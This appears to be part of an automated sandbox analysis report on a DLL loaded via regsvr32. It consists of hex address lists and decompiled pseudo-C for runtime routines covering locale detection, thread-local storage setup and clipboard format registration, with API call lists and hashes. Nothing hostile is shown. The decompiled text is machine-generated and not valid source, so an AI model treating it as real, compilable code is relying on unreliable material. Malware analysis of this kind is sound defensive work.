                                                                                                                0x00000000
                                                                                                                0x1004ae00
                                                                                                                0x1004addb
                                                                                                                0x1004addf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004addf
                                                                                                                0x1004adba
                                                                                                                0x1004adbe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004adbe
                                                                                                                0x1004ad1c
                                                                                                                0x1004ad1e
                                                                                                                0x1004ad35
                                                                                                                0x1004ad3d
                                                                                                                0x1004ad3f
                                                                                                                0x1004ad56
                                                                                                                0x1004ad5e
                                                                                                                0x1004ad60
                                                                                                                0x1004ad77
                                                                                                                0x1004ad7f
                                                                                                                0x1004ad81
                                                                                                                0x1004ad8e
                                                                                                                0x1004ad8e
                                                                                                                0x00000000
                                                                                                                0x1004ad81
                                                                                                                0x1004ad6d
                                                                                                                0x1004ad71
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ad71
                                                                                                                0x1004ad4c
                                                                                                                0x1004ad50
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ad50
                                                                                                                0x1004ad2b
                                                                                                                0x1004ad2f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ac92
                                                                                                                0x1004ac92
                                                                                                                0x1004ac95
                                                                                                                0x1004ac99
                                                                                                                0x1004ac9b
                                                                                                                0x1004acae
                                                                                                                0x1004acae
                                                                                                                0x1004acb2
                                                                                                                0x1004acb6
                                                                                                                0x1004acb8
                                                                                                                0x1004accb
                                                                                                                0x1004accb
                                                                                                                0x1004accf
                                                                                                                0x1004acd3
                                                                                                                0x1004acd5
                                                                                                                0x1004ace8
                                                                                                                0x1004ace8
                                                                                                                0x1004acec
                                                                                                                0x1004acf0
                                                                                                                0x1004acf2
                                                                                                                0x1004acf8
                                                                                                                0x1004acfb
                                                                                                                0x1004acff
                                                                                                                0x1004acff
                                                                                                                0x00000000
                                                                                                                0x1004acf2
                                                                                                                0x1004acdb
                                                                                                                0x1004acde
                                                                                                                0x1004ace2
                                                                                                                0x1004ace6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ace6
                                                                                                                0x1004acbe
                                                                                                                0x1004acc1
                                                                                                                0x1004acc5
                                                                                                                0x1004acc9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004acc9
                                                                                                                0x1004aca1
                                                                                                                0x1004aca4
                                                                                                                0x1004aca8
                                                                                                                0x1004acac
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004acac
                                                                                                                0x1004ac83
                                                                                                                0x1004ac83
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                • Instruction ID: 5b9a8e420182fb4b6de152f1235b7ca268fbd91767dc6c74a702410ea6ff69e6
                                                                                                                • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                • Instruction Fuzzy Hash: 86C16273D0E9B30A83B5C12D405826BEFA2AFC268133BC3F59CE46F389D52A5D4495D4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1005D95D(intOrPtr* __ecx, intOrPtr* _a4) {
                                                                                                                				signed int _t18;
                                                                                                                				signed int _t19;
                                                                                                                				signed int _t27;
                                                                                                                				signed int _t31;
                                                                                                                				signed int _t35;
                                                                                                                				signed int _t36;
                                                                                                                				signed int _t40;
                                                                                                                				signed int _t44;
                                                                                                                
                                                                                                                				_t15 = __ecx;
                                                                                                                				_t36 =  *(__ecx + 4);
                                                                                                                				_t18 = _t36 << 0x1c;
                                                                                                                				_t19 = _t18 >> 0x1c;
                                                                                                                				if(_t18 == 0 || _t19 == 2) {
                                                                                                                					_t20 = _a4;
                                                                                                                					_t3 = _t20 + 4; // 0x100be9d4
                                                                                                                					_t27 = ( *_t3 << 0x0000001c >> 0x0000001c ^ _t36) & 0x0000000f ^ _t36;
                                                                                                                					 *(_t15 + 4) = _t27;
                                                                                                                					_t5 = _t20 + 4; // 0x100be9d4
                                                                                                                					_t40 = ( *_t5 ^ _t27) & 0x00000010 ^ _t27;
                                                                                                                					 *(_t15 + 4) = _t40;
                                                                                                                					_t7 = _t20 + 4; // 0x100be9d4
                                                                                                                					_t31 = ( *_t7 ^ _t40) & 0x00000020 ^ _t40;
                                                                                                                					 *(_t15 + 4) = _t31;
                                                                                                                					_t9 = _t20 + 4; // 0x100be9d4
                                                                                                                					_t44 = ( *_t9 ^ _t31) & 0x00000040 ^ _t31;
                                                                                                                					 *(_t15 + 4) = _t44;
                                                                                                                					_t11 = _t20 + 4; // 0x100be9d4
                                                                                                                					_t35 = ( *_t11 ^ _t44) & 0x00000080 ^ _t44;
                                                                                                                					 *(_t15 + 4) = _t35;
                                                                                                                					_t13 = _t20 + 4; // 0x100be9d4
                                                                                                                					 *(_t15 + 4) = ( *_t13 ^ _t35) & 0x00000800 ^ _t35;
                                                                                                                					 *_t15 =  *_a4;
                                                                                                                					return _t15;
                                                                                                                				}
                                                                                                                				return __ecx;
                                                                                                                			}












                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • Opcode ID: 3806309510c485df092187976a7821ca5c5acb27e48c45fe9b0aaa0c6170d12f
                                                                                                                • Instruction ID: 56065d2e7ba31eb1f0cabcf7fe8377e24bdfdb9552a93b06c076dd897f8e7659
                                                                                                                • Opcode Fuzzy Hash: 3806309510c485df092187976a7821ca5c5acb27e48c45fe9b0aaa0c6170d12f
                                                                                                                • Instruction Fuzzy Hash: AD011B72E115304B9358DF19CA05556FAD2EFCD61475BC2AAC8496B226D531EC028BC0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E100198A8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t73;
                                                                                                                				struct HINSTANCE__* _t78;
                                                                                                                				_Unknown_base(*)()* _t79;
                                                                                                                				struct HINSTANCE__* _t81;
                                                                                                                				signed int _t92;
                                                                                                                				signed int _t94;
                                                                                                                				unsigned int _t97;
                                                                                                                				void* _t113;
                                                                                                                				unsigned int _t115;
                                                                                                                				signed short _t123;
                                                                                                                				unsigned int _t124;
                                                                                                                				_Unknown_base(*)()* _t131;
                                                                                                                				signed short _t133;
                                                                                                                				unsigned int _t134;
                                                                                                                				intOrPtr _t143;
                                                                                                                				void* _t144;
                                                                                                                				int _t145;
                                                                                                                				int _t146;
                                                                                                                				signed int _t164;
                                                                                                                				void* _t167;
                                                                                                                				signed int _t169;
                                                                                                                				void* _t170;
                                                                                                                				int _t172;
                                                                                                                				signed int _t176;
                                                                                                                				void* _t177;
                                                                                                                				CHAR* _t181;
                                                                                                                				void* _t183;
                                                                                                                				void* _t184;
                                                                                                                
                                                                                                                				_t167 = __edx;
                                                                                                                				_t184 = _t183 - 0x118;
                                                                                                                				_t181 = _t184 - 4;
                                                                                                                				_t73 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_t181[0x118] = _t73 ^ _t181;
                                                                                                                				_push(0x58);
                                                                                                                				E1004764D(0x1008ed58, __ebx, __edi, __esi);
                                                                                                                				_t169 = 0;
                                                                                                                				 *(_t181 - 0x40) = _t181[0x124];
                                                                                                                				 *(_t181 - 0x14) = 0;
                                                                                                                				 *(_t181 - 0x10) = 0;
                                                                                                                				_t78 = GetModuleHandleA("kernel32.dll");
                                                                                                                				 *(_t181 - 0x18) = _t78;
                                                                                                                				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
                                                                                                                				if(_t79 == 0) {
                                                                                                                					if(GetVersion() >= 0) {
                                                                                                                						_t81 = GetModuleHandleA("ntdll.dll");
                                                                                                                						if(_t81 != 0) {
                                                                                                                							 *(_t181 - 0x14) = 0;
                                                                                                                							EnumResourceLanguagesA(_t81, 0x10, 1, 0x10018e62, _t181 - 0x14);
                                                                                                                							if( *(_t181 - 0x14) != 0) {
                                                                                                                								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
                                                                                                                								_t145 = _t97 & 0x3ff;
                                                                                                                								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
                                                                                                                								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
                                                                                                                								 *(_t181 - 0x10) = 2;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						 *(_t181 - 0x18) = 0;
                                                                                                                						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
                                                                                                                							 *(_t181 - 0x44) = 0x10;
                                                                                                                							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
                                                                                                                								_t113 = E1004C7D0( &(_t181[0x108]), "%x", _t181 - 0x1c);
                                                                                                                								_t184 = _t184 + 0xc;
                                                                                                                								if(_t113 == 1) {
                                                                                                                									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                									_t146 = _t115 & 0x3ff;
                                                                                                                									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
                                                                                                                									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
                                                                                                                									 *(_t181 - 0x10) = 2;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							RegCloseKey( *(_t181 - 0x18));
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t123 =  *_t79() & 0x0000ffff;
                                                                                                                					 *(_t181 - 0x14) = _t123;
                                                                                                                					_t124 = _t123 & 0x0000ffff;
                                                                                                                					_t164 = _t124 & 0x3ff;
                                                                                                                					 *(_t181 - 0x1c) = _t164;
                                                                                                                					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
                                                                                                                					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
                                                                                                                					 *(_t181 - 0x10) = 2;
                                                                                                                					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
                                                                                                                					if(_t131 != 0) {
                                                                                                                						_t133 =  *_t131() & 0x0000ffff;
                                                                                                                						 *(_t181 - 0x14) = _t133;
                                                                                                                						_t134 = _t133 & 0x0000ffff;
                                                                                                                						_t172 = _t134 & 0x3ff;
                                                                                                                						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
                                                                                                                						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
                                                                                                                						 *(_t181 - 0x10) = 4;
                                                                                                                					}
                                                                                                                					_t169 = 0;
                                                                                                                				}
                                                                                                                				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
                                                                                                                				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
                                                                                                                				_t181[0x105] = 0;
                                                                                                                				_t181[0x104] = 0;
                                                                                                                				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
                                                                                                                					_t143 = 0x20;
                                                                                                                					E10049170(_t169, _t181 - 0x64, _t169, _t143);
                                                                                                                					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
                                                                                                                					 *(_t181 - 0x5c) = _t181;
                                                                                                                					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
                                                                                                                					 *(_t181 - 0x48) = 0x10000000;
                                                                                                                					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
                                                                                                                					L10018E78(_t181 - 0x3c, 0x10000000, 0xffffffff);
                                                                                                                					 *(_t181 - 4) = _t169;
                                                                                                                					if(L10018F28(_t181 - 0x3c, _t181 - 0x64) != 0) {
                                                                                                                						L10018F5E(_t181 - 0x3c);
                                                                                                                					}
                                                                                                                					_t176 = 0;
                                                                                                                					if( *(_t181 - 0x10) <= _t169) {
                                                                                                                						L23:
                                                                                                                						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
                                                                                                                						E1001963E(_t181 - 0x3c);
                                                                                                                						_t92 = _t169;
                                                                                                                						goto L24;
                                                                                                                					} else {
                                                                                                                						while(1) {
                                                                                                                							_t94 = E10019571(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
                                                                                                                							if(_t94 != _t169) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t176 =  &(1[_t176]);
                                                                                                                							if(_t176 <  *(_t181 - 0x10)) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							goto L23;
                                                                                                                						}
                                                                                                                						_t169 = _t94;
                                                                                                                						goto L23;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t92 = 0;
                                                                                                                					L24:
                                                                                                                					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
                                                                                                                					_pop(_t170);
                                                                                                                					_pop(_t177);
                                                                                                                					_pop(_t144);
                                                                                                                					return E1004763E(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
                                                                                                                				}
                                                                                                                			}

































                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100198C7
                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 100198E8
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 100198F9
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 1001992F
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 10019937
                                                                                                                • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1001994B
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 1001996F
                                                                                                                • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10019975
                                                                                                                • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 100199AE
                                                                                                                • GetVersion.KERNEL32 ref: 100199C3
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 100199E8
                                                                                                                • RegQueryValueExA.ADVAPI32 ref: 10019A0D
                                                                                                                • _sscanf.LIBCMT ref: 10019A2D
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 10019A62
                                                                                                                • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10019A68
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10019A77
                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10019A87
                                                                                                                • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10018E62,?), ref: 10019AA2
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 10019AD3
                                                                                                                • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10019AD9
                                                                                                                • _memset.LIBCMT ref: 10019AF3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                • API String ID: 434808117-483790700
                                                                                                                • Opcode ID: 1f76b75c5c0de8f23b8189428d9e754c8473ee393acc1e36a57432746dbee113
                                                                                                                • Instruction ID: 2d735a54099eb8c66c4ab65cc8d4ae4af9cbc33185515143b8a473405d5eae94
                                                                                                                • Opcode Fuzzy Hash: 1f76b75c5c0de8f23b8189428d9e754c8473ee393acc1e36a57432746dbee113
                                                                                                                • Instruction Fuzzy Hash: 42817C70D002699ADB10DFA5DC85AEEBBF9FF48340F50012AE955E7280DB789A45CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E10051878(void* __ebx) {
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				_Unknown_base(*)()* _t7;
                                                                                                                				long _t10;
                                                                                                                				void* _t11;
                                                                                                                				int _t12;
                                                                                                                				void* _t18;
                                                                                                                				intOrPtr _t21;
                                                                                                                				long _t26;
                                                                                                                				void* _t30;
                                                                                                                				struct HINSTANCE__* _t37;
                                                                                                                				void* _t40;
                                                                                                                				void* _t42;
                                                                                                                
                                                                                                                				_t30 = __ebx;
                                                                                                                				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                				if(_t37 != 0) {
                                                                                                                					 *0x100be428 = GetProcAddress(_t37, "FlsAlloc");
                                                                                                                					 *0x100be42c = GetProcAddress(_t37, "FlsGetValue");
                                                                                                                					 *0x100be430 = GetProcAddress(_t37, "FlsSetValue");
                                                                                                                					_t7 = GetProcAddress(_t37, "FlsFree");
                                                                                                                					__eflags =  *0x100be428;
                                                                                                                					_t40 = TlsSetValue;
                                                                                                                					 *0x100be434 = _t7;
                                                                                                                					if( *0x100be428 == 0) {
                                                                                                                						L6:
                                                                                                                						 *0x100be42c = TlsGetValue;
                                                                                                                						 *0x100be428 = E100514EF;
                                                                                                                						 *0x100be430 = _t40;
                                                                                                                						 *0x100be434 = TlsFree;
                                                                                                                					} else {
                                                                                                                						__eflags =  *0x100be42c;
                                                                                                                						if( *0x100be42c == 0) {
                                                                                                                							goto L6;
                                                                                                                						} else {
                                                                                                                							__eflags =  *0x100be430;
                                                                                                                							if( *0x100be430 == 0) {
                                                                                                                								goto L6;
                                                                                                                							} else {
                                                                                                                								__eflags = _t7;
                                                                                                                								if(_t7 == 0) {
                                                                                                                									goto L6;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t10 = TlsAlloc();
                                                                                                                					__eflags = _t10 - 0xffffffff;
                                                                                                                					 *0x100ba250 = _t10;
                                                                                                                					if(_t10 == 0xffffffff) {
                                                                                                                						L15:
                                                                                                                						_t11 = 0;
                                                                                                                						__eflags = 0;
                                                                                                                					} else {
                                                                                                                						_t12 = TlsSetValue(_t10,  *0x100be42c);
                                                                                                                						__eflags = _t12;
                                                                                                                						if(_t12 == 0) {
                                                                                                                							goto L15;
                                                                                                                						} else {
                                                                                                                							E1004C677();
                                                                                                                							 *0x100be428 = E10051420( *0x100be428);
                                                                                                                							 *0x100be42c = E10051420( *0x100be42c);
                                                                                                                							 *0x100be430 = E10051420( *0x100be430);
                                                                                                                							 *0x100be434 = E10051420( *0x100be434);
                                                                                                                							_t18 = E1004EB97();
                                                                                                                							__eflags = _t18;
                                                                                                                							if(_t18 == 0) {
                                                                                                                								L14:
                                                                                                                								E10051556();
                                                                                                                								goto L15;
                                                                                                                							} else {
                                                                                                                								_push(E100516E2);
                                                                                                                								_t21 =  *((intOrPtr*)(E1005148C( *0x100be428)))();
                                                                                                                								__eflags = _t21 - 0xffffffff;
                                                                                                                								 *0x100ba24c = _t21;
                                                                                                                								if(_t21 == 0xffffffff) {
                                                                                                                									goto L14;
                                                                                                                								} else {
                                                                                                                									_t42 = E1005496F(1, 0x214);
                                                                                                                									__eflags = _t42;
                                                                                                                									if(_t42 == 0) {
                                                                                                                										goto L14;
                                                                                                                									} else {
                                                                                                                										_push(_t42);
                                                                                                                										_push( *0x100ba24c);
                                                                                                                										__eflags =  *((intOrPtr*)(E1005148C( *0x100be430)))();
                                                                                                                										if(__eflags == 0) {
                                                                                                                											goto L14;
                                                                                                                										} else {
                                                                                                                											_push(0);
                                                                                                                											_push(_t42);
                                                                                                                											E10051593(_t30, _t37, _t42, __eflags);
                                                                                                                											_t26 = GetCurrentThreadId();
                                                                                                                											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                                                											 *_t42 = _t26;
                                                                                                                											_t11 = 1;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t11;
                                                                                                                				} else {
                                                                                                                					E10051556();
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10048C1A,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 1005187E
                                                                                                                • __mtterm.LIBCMT ref: 1005188A
                                                                                                                  • Part of subcall function 10051556: __decode_pointer.LIBCMT ref: 10051567
                                                                                                                  • Part of subcall function 10051556: TlsFree.KERNEL32(00000021,10048CB6,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 10051581
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 100518A0
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 100518AD
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 100518BA
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 100518C7
                                                                                                                • TlsAlloc.KERNEL32(?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 10051917
                                                                                                                • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 10051932
                                                                                                                • __init_pointers.LIBCMT ref: 1005193C
                                                                                                                • __encode_pointer.LIBCMT ref: 10051947
                                                                                                                • __encode_pointer.LIBCMT ref: 10051957
                                                                                                                • __encode_pointer.LIBCMT ref: 10051967
                                                                                                                • __encode_pointer.LIBCMT ref: 10051977
                                                                                                                • __decode_pointer.LIBCMT ref: 10051998
                                                                                                                • __calloc_crt.LIBCMT ref: 100519B1
                                                                                                                • __decode_pointer.LIBCMT ref: 100519CB
                                                                                                                • __initptd.LIBCMT ref: 100519DA
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 100519E1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                • API String ID: 2657569430-3819984048
                                                                                                                • Opcode ID: a20bf7fe6d10bbdb3b48a3c10ac7808f7183ddfaa0b16d44cce35714afc1420d
                                                                                                                • Instruction ID: 0b706c3264f501d65f347b28e59f904ffa28db24f5d0894a088f402869511bed
                                                                                                                • Opcode Fuzzy Hash: a20bf7fe6d10bbdb3b48a3c10ac7808f7183ddfaa0b16d44cce35714afc1420d
                                                                                                                • Instruction Fuzzy Hash: E631A23D8112A1AAF711EF748C85ADA3BE4EB493A0B104B26FA11C31B1DB34EC85CF54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003BA9C(intOrPtr* __ecx) {
                                                                                                                				intOrPtr* _t27;
                                                                                                                
                                                                                                                				_t27 = __ecx;
                                                                                                                				 *_t27 = RegisterClipboardFormatA("Native");
                                                                                                                				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
                                                                                                                				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
                                                                                                                				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
                                                                                                                				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
                                                                                                                				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
                                                                                                                				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
                                                                                                                				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
                                                                                                                				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
                                                                                                                				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
                                                                                                                				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
                                                                                                                				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
                                                                                                                				return _t27;
                                                                                                                			}


                                                                                                                APIs
